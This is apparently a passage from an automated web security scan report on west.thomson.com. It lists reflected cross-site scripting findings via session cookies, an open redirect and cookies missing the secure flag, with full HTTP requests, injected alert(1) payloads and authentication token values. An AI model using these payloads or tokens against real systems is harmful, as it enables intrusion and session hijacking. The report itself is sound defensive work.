The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61497"-alert(1)-"12b550c25c9 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /store/DOTD.aspx?Product_id=12484463&PromCode=645229L86530&PromType=internal HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn61497"-alert(1)-"12b550c25c9 ; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; UserSiteIdIdentifier=
Response (redirected)
HTTP/1.1 200 OK=ah4ejmu0ygj3wwn2xfvezn4u; path=/; HttpOnly/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... "756bd9ec9a083c52");"http://recs.richrelevance.com/rrserver/");"bijb1vookoje2tnvwh5oouwn61497"-alert(1)-"12b550c25c9 ");{71c28bcc-895f-4239-9850-58ed6aba178d}");...[SNIP]...
1.10. http://west.thomson.com/store/product.aspx [ASP.NET_SessionId cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/store/product.aspx
Issue detail
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc5a9"-alert(1)-"7be52016318 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /store/product.aspx?R=160547&Product_id=12484463&PromCode=645229L86530&PromType=internal HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwndc5a9"-alert(1)-"7be52016318 ; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; UserSiteIdIdentifier=
Response (redirected)
HTTP/1.1 200 OK=ebc2cwnzpayjeyygpipklpfw; path=/; HttpOnly/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... "756bd9ec9a083c52");"http://recs.richrelevance.com/rrserver/");"bijb1vookoje2tnvwh5oouwndc5a9"-alert(1)-"7be52016318 ");{71c28bcc-895f-4239-9850-58ed6aba178d}");...[SNIP]...
1.11. http://west.thomson.com/store/secure/ShoppingBasket.aspx [ASP.NET_SessionId cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/store/secure/ShoppingBasket.aspx
Issue detail
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b25a"-alert(1)-"ecd2518c6a1 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /store/secure/ShoppingBasket.aspx?PromCode=571423 HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn2b25a"-alert(1)-"ecd2518c6a1 ; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; UserSiteIdIdentifier=; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1
Response (redirected)
HTTP/1.1 200 OK263FA61ED6CAB24498ED784832B1F6C310B8E65120F6805A574E9638A7AB4C3CC175373B865898C44D339F6A9F26BE76DF4E499DC1A6D05B941F5F842639B825C31009DAAA566E95FB74DF356033C16F22F60644E1CBF8A4D035FFA487C02A81FE388604890DF7B23A94B0DA8CCA2DED074794AE0AD8C192B73DC7DD3FEC7BB4FE8F545F6B8E6EB9461A17731D0F0FEA08E8A1A1E449755F4B679F334DC04DBE919315D505529E5E96A8A1239BBDAEF0E6900DEA0523B0E614A318447617E3C0D43590D8CF9BAF4591587E8A22458F03985BD5252FBF20B4A1B878A90ACE4; expires=Tue, 26-Apr-2011 20:50:49 GMT; path=/; HttpOnlyFAEF83FDE235510D5951017483868771BE4B568E3ADC9B2E4A9D772A8D58CBC8CE6FBAFD4C3804D10658FEB4128BE0B14B0420C8B709BD9C099C351C91303A5B635827BFF6046E286CAF6B6139AA7C7E8A201D2109AE352BA480B10C72B4BA8A0A05C37F192B189B7447241B38C32980B55AE068E2B576CC388DF620298AE1C9E67E2608423B860840F43C52B318E443C2ED2B38472A89B6B66EFE6F9B3A84B4AB3E6CA72B666F573CC2BCF7A9A644B8119F21A324600196D5C0903E4BF798A76222C37CC43825A5D8EA860EC5CE873FBC2BB01171CF04943338DCF7E4983; path=/=o4ukbml35ljm0z3zebxzyply; path=/; HttpOnly/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... "756bd9ec9a083c52");"http://recs.richrelevance.com/rrserver/");"bijb1vookoje2tnvwh5oouwn2b25a"-alert(1)-"ecd2518c6a1 ");{71c28bcc-895f-4239-9850-58ed6aba178d}");...[SNIP]...
1.12. http://west.thomson.com/store/secure/ShoppingBasket.aspx [anonymous_userid_1 cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/store/secure/ShoppingBasket.aspx
Issue detail
The value of the anonymous_userid_1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a93fe"-alert(1)-"ce20752a9b2 was submitted in the anonymous_userid_1 cookie. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /store/secure/ShoppingBasket.aspx?PromCode=571423 HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}a93fe"-alert(1)-"ce20752a9b2 ; UserSiteIdIdentifier=; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75
Response (redirected)
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... "http://recs.richrelevance.com/rrserver/");"bijb1vookoje2tnvwh5oouwn");{71c28bcc-895f-4239-9850-58ed6aba178d}a93fe"-alert(1)-"ce20752a9b2 ");...[SNIP]...
1.13. http://west.thomson.com/support/contact-us/default.aspx [ASP.NET_SessionId cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/support/contact-us/default.aspx
Issue detail
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9d95"-alert(1)-"599a6a07add was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwnd9d95"-alert(1)-"599a6a07add ; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OK245B9A681851AC4B6097449315C3957EAF9D70D5B5B7143F2A36510D73ED262DF735293B833BFDBCBDD8B93A17C7D56A9E77D98C61DC5FAD590600C8FAF335B87F7F57DB853BA4283AE805760A3BBFA11499E1FE22774E25DC5B8083195FA3914862BB80D4725341AE5FE2FF7AE471084209024A71314CEE538BA215482F7C6A258EC4C0F53CBA2A98C19D00E663B18BD18371A7918415032A6E0A0904F5F364D00A322D9BF368A77C879CBA454224E1DE4DC6A7012CDDE7496AC4ED9EEB376EC9AEFFD0D028F5EFACD099DB4C4AC9070D2893F49FE134F581B9E6163C0DD; expires=Tue, 26-Apr-2011 20:53:11 GMT; path=/; HttpOnlyBB9DD38A787FE10FEF8EA07FB89449F9125866B88957F87E9C5CC464E3DCEB11A207F0BF84EA5AC7D058128C60D0776F4B96B50CB7C12137FF1954BB1945684B5657582CB5962904F98769E73D0E2EF341DDDE214C9586271E3715F94FD8B6240F517E1C47D8E5CAF385D9BFF81E8D83853A6A67CF80B25117E580F379AA754497327DED351D0AD84FDA38E85DEDDDD3812C22CCC4EDB62E5809A083C84D939E1D6F57710ABD74C109356D01528EC0E4D55786FFA23076511B2FBA468043D79F1965CF8EED09419D54DC755AE66BB1BA01BAE106418689BD87B9019837AFD; path=/=wf0pa2eos3vudxiwmk4jx5zz; path=/; HttpOnly/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... "756bd9ec9a083c52");"http://recs.richrelevance.com/rrserver/");"bijb1vookoje2tnvwh5oouwnd9d95"-alert(1)-"599a6a07add ");{71c28bcc-895f-4239-9850-58ed6aba178d}");...[SNIP]...
1.14. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx [ASP.NET_SessionId cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/Promotions/EmailPreferences/Login.aspx
Issue detail
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d229a"-alert(1)-"e585a11d57f was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwnd229a"-alert(1)-"e585a11d57f ; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=
Response
HTTP/1.1 200 OKD2C2114AE4233E814DF990CBD237FD933746473F620BAAECC5AC0C47F01B7EECCC7B33514EDCB7BE4C324F4639B569203B28E6A23CAC79D5DAEC2CFB07CCFEFB8557CA8CAA25F002568D9903AA6D6EAEC00A9808AFB37407CAEE542442A75994F44ECC8B4587CCAFE8C4D057B479EE607DE2C1C275D55E609302DB64C397C3F616C8DFEA0FD532217D8EB52AE2789B4D9E982AD611F54FA76410CDB8EB2C19AE34B4ECDA3E0B1D3B5AF1EF188872B515797C82ECD3A666364928E78EA40A6EA28FEA90C504224967F02A5BAC090FAA0F14B3ED53A74476EDFE8B78AEF2E3A; expires=Tue, 26-Apr-2011 20:51:46 GMT; path=/; HttpOnly25B1FF7DD7D6C62FF514D1B6809A7C72A76B02804870A311C3EA2268BF06D728F4580913F176920526CB9DC40BA07B796AE6F6C3E981CAC08E7003688DF890A0EC63ECF2D6D28037B11B7040C8023908BFF75CE67BDA59D0E81124762EABDDC8B2410DC6D7EAE2A439F95EB9A799897172F6BFD71236FEAF93586AD4B2803103CCB780DC6057A70F83A4CC76B095AB2D62CC82264A6846F88E36CE2BCF098BAE65B2773FA8BAC6C64D45BDE7E5C6BC4FB43AD875BC840A7C123E9ED1729A78E47FAE8D8AD05567D53C9F419FAB86A700E76333551B55ABFB1AF190835816C; path=/=vaprkjr0wmp041lz1zda2jrr; path=/; HttpOnly/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... "756bd9ec9a083c52");"https://recs.richrelevance.com/rrserver/");"bijb1vookoje2tnvwh5oouwnd229a"-alert(1)-"e585a11d57f ");{71c28bcc-895f-4239-9850-58ed6aba178d}");...[SNIP]...
1.15. https://west.thomson.com/store/secure/EmptyBasket.aspx [ASP.NET_SessionId cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/store/secure/EmptyBasket.aspx
Issue detail
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60c4d"-alert(1)-"00c0d436f58 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /store/secure/EmptyBasket.aspx HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn60c4d"-alert(1)-"00c0d436f58 ; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_ppv=0; s_sq=%5B%5BB%5D%5D; UserSiteIdIdentifier=; .WTCAUTH=0D1C43F14C3D0360D4C56BDD0D49E3A1E347C13F76ADC1B282235271457FAC648FB37FE6B223762A24E6CB268609BC8463ECB71442613CE6C286443DD8C796AD188F8568D73785118A509021BEABBD4E55D10E5F1E3A4F4A3F1B558AB2332C44A56F489B0571AEA92276AE792D9D8761A0FBB7322D072015D4B719941EFD8FCB5CDB63E1CEF01EF859C876D1DA920B7EB3539BA4B4D934B5A3CF2F56BB805BA3F3435E9F173B50A3D9F7C34D0C8E7180A2F74BC8118F96769794F6D4C7A36DCE92EEA8FE38E72E95AF86A85ADB9338C9E73EDA3652910D79D1A7D57B6EF7422F00DB82A9
Response
HTTP/1.1 200 OK68B8C5013BE5A2EB7575E06E6174AF9897502A0511297BDE5772CD5739B7504B9636D9CAEC96C6DA8533B45F8114B4A355B5FBB4161156EB94B70E0092285E6DC5624C896D2C7A899C886D58A38D1EBC3B10AF21B1A1CC06FCA7B8D4FC1E4F6FAD2D71AF519A076A525C4A21977C46946A72C5C90CBE27C412B0892C5AC0DF5795D71CD24E07A3374D9B8BAF8F2D22A38AED03061A332EFE0F5DAC2DF39DA2FF6D8D7AB0999D34FE6268CCFABE09CE201B547180C78C622BE157C5ED94E721295227D0E5C510373DF475FE045B6C8723F56AE64718D2018C24F030DE48EED; path=/=jus41y0tsf20rcm5angb3jic; path=/; HttpOnly/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... "756bd9ec9a083c52");"https://recs.richrelevance.com/rrserver/");"bijb1vookoje2tnvwh5oouwn60c4d"-alert(1)-"00c0d436f58 ");{71c28bcc-895f-4239-9850-58ed6aba178d}");...[SNIP]...
2. Open redirection
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://west.thomson.com
Path:
/Register/CreateTransferToken.aspx
Issue detail
The value of the ReturnUrl request parameter is used to perform an HTTP redirect. The payload http%3a//a1a5b9bd6bfb8fd5d/a%3fhttps%3a//myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn%3fReturnUrl%3dhttp%3a//myaccount.west.thomson.com/MYACCOUNT/default.aspx%3fReturnUrl%3d/MyAccount/Common/Landing/MyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless was submitted in the ReturnUrl parameter. This caused a redirection to the following URL:http://a1a5b9bd6bfb8fd5d/a?https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl=http%3a%2f%2fmyaccount.west.thomson.com%2fMYACCOUNT%2fdefault.aspx%3fReturnUrl%3d%2fMyAccount%2fCommon%2fLanding%2fMyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless&transferToken=
Issue background
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs. Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list. The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL. The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect. The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.
Request
GET /Register/CreateTransferToken.aspx?ReturnUrl=http%3a//a1a5b9bd6bfb8fd5d/a%3fhttps%3a//myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn%3fReturnUrl%3dhttp%3a//myaccount.west.thomson.com/MYACCOUNT/default.aspx%3fReturnUrl%3d/MyAccount/Common/Landing/MyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless HTTP/1.1,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; c=undefined571422undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shopping%20Cart; s_sq=thwest%3D%2526pid%253DShopping%252520Cart%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Btry%25257Bctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524btnProceedBottomHideSub%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=FDCDD3CCDE1E864402B9FC99C17C5B887E4F142C7E539940508F9F7479A6A6F433A5B1298DA99CBBD01CC94400DE585D91C0BC2044A5DA3945B77A521C66DF4338A0F22A9AE831BC4D28B1B360FFA8BC5F7FEFCCCD8455667134A5A3C8102426B33E2E3C145412DD2FC7BAE2D1CF511058AF4AC6C8158E791D929260CFD17BFDF9A91806384EB9892622A5C4D4B2F99ACA7BB96849E4E1F35EDDBE997CF3F1A087FAD644670217520402D18C4C7DC1B3E409FCCFD1749D5356AF72C2DE92A54626B4737812FE5F26773127B302BF70BC002DA3B3EDC640107FA24DBEFD453411A2E9878D
Response
HTTP/1.1 302 Foundhttp://a1a5b9bd6bfb8fd5d/a?https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl=http%3a%2f%2fmyaccount.west.thomson.com%2fMYACCOUNT%2fdefault.aspx%3fReturnUrl%3d%2fMyAccount%2fCommon%2fLanding%2fMyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless&transferToken= A1F3F2A28FCD620DC558FA8566C6CB61941FAFC1CB70EF3C2FA21E7D38A68F49C1B803B1B567BE0C9891A334C00CE10565E0DD1C8CCEFE86E92AD19064B187DF6C5F804FD763E2DB07DD422DABCD9BF70AC3114C770033463A55C91BC79C3E9A4622BEB5707849259AD42E88BD0AE2E6EF20190BC3C89DFD08FBCDAC1288AB0E7450E6D764ECE7FB8D8BE5E4EFD31E0573F33E361E3C42DCA6177D73B0C382E70870F2D578A80B1073193DCABCE0D8FB750E29E54F28C17A99337FD2AF6CFB79DD7CE2FCC341DC3A102D3D664674CAD85CB15B43A586793EACBAE8D982240; path=/>d6bfb8fd5d/a?https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl=...[SNIP]...
3. SSL cookie without secure flag set
previous
next
There are 6 instances of this issue:
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
3.1. https://west.thomson.com/GlobalBackgroundStyles.5.1.421.22.ashx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://west.thomson.com
Path:
/GlobalBackgroundStyles.5.1.421.22.ashx
Issue detail
The following cookie was issued by the application and does not have the secure flag set:.WTCAUTH=31ACA283401DA17A05061FA0F538B8F86B7C65D5AB4A89A80E18F25BB77CEE40DB1033D80460E2C8E2A5472BD6CA74D385343046E024D8A9016A49A4B932722E3A8B6E13E322F378E10C55CE5C6D739F961129503F73317944D18CF6FC365195204B6B3DDC328162B313B90606D91909B6A1C8F543CA6E9896E8054786853477E91BF7A0F5CB5530F37A45203DF832D4841547B09AF64E9712AA65C817E0A78CBBD365CBD13686366C4F93CC55EB97CDAC4CE43C02380AC22DBB7C12A6CC859B899F5ADFFCC303480CB636B2447BED43ECFD31E730F41D8F75BCF8299C965EDBEDB25AD4; path=/
Request
GET /GlobalBackgroundStyles.5.1.421.22.ashx HTTP/1.1/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation;q=0.3=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_sq=thwest%3D%2526pid%253DBankruptcy%252520Exemption%252520Manual%25252C%2525202010%252520ed.%252520%252528West%252527s%252526%252523174%25253B%252520Bankruptcy%252520Series%252529%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BshowPopupBubble%252528%252527ctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524ctl00%252524popu%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=A67F8B510CDBD58F31C838E207550441CEB1CACBCF20772FABFD044A384585124BA1797DC696288EE75DD493FCDA4E346EC5188BF838DB30477D657A2B3353079A4A75CC7ADF7B32C6DFC8CFB3EE9A58DA7FA502513F8B57574483FBFFFB85B197C174609DEBF07D119AF640ED1BDE7FA911D2469C6D1F6E4CFA3E4CD98E5EDA89F130ADB2B2BB195DEF71DA3D31374DF57A62DF7A9EB3103E3E90B8657C457C5A7DBC308AB465C8B88F9F9BB15ECBD076348E09B023DFF9E2C2D12FFA4890F4C4A7A979AA2F883A180B60FA2CEEB1997ED8D19C4A177200624EEB34DD1B8E1517173999
Response
HTTP/1.1 200 OKSet-Cookie: .WTCAUTH=31ACA283401DA17A05061FA0F538B8F86B7C65D5AB4A89A80E18F25BB77CEE40DB1033D80460E2C8E2A5472BD6CA74D385343046E024D8A9016A49A4B932722E3A8B6E13E322F378E10C55CE5C6D739F961129503F73317944D18CF6FC365195204B6B3DDC328162B313B90606D91909B6A1C8F543CA6E9896E8054786853477E91BF7A0F5CB5530F37A45203DF832D4841547B09AF64E9712AA65C817E0A78CBBD365CBD13686366C4F93CC55EB97CDAC4CE43C02380AC22DBB7C12A6CC859B899F5ADFFCC303480CB636B2447BED43ECFD31E730F41D8F75BCF8299C965EDBEDB25AD4; path=/ {background-image:url('https://images.west.thomson.com/organizations/headers/sidebar1.jpg');margin-top:2px;height:85px;width:241px}.Header_Org_SideBar2{background-image:url('https:...[SNIP]...
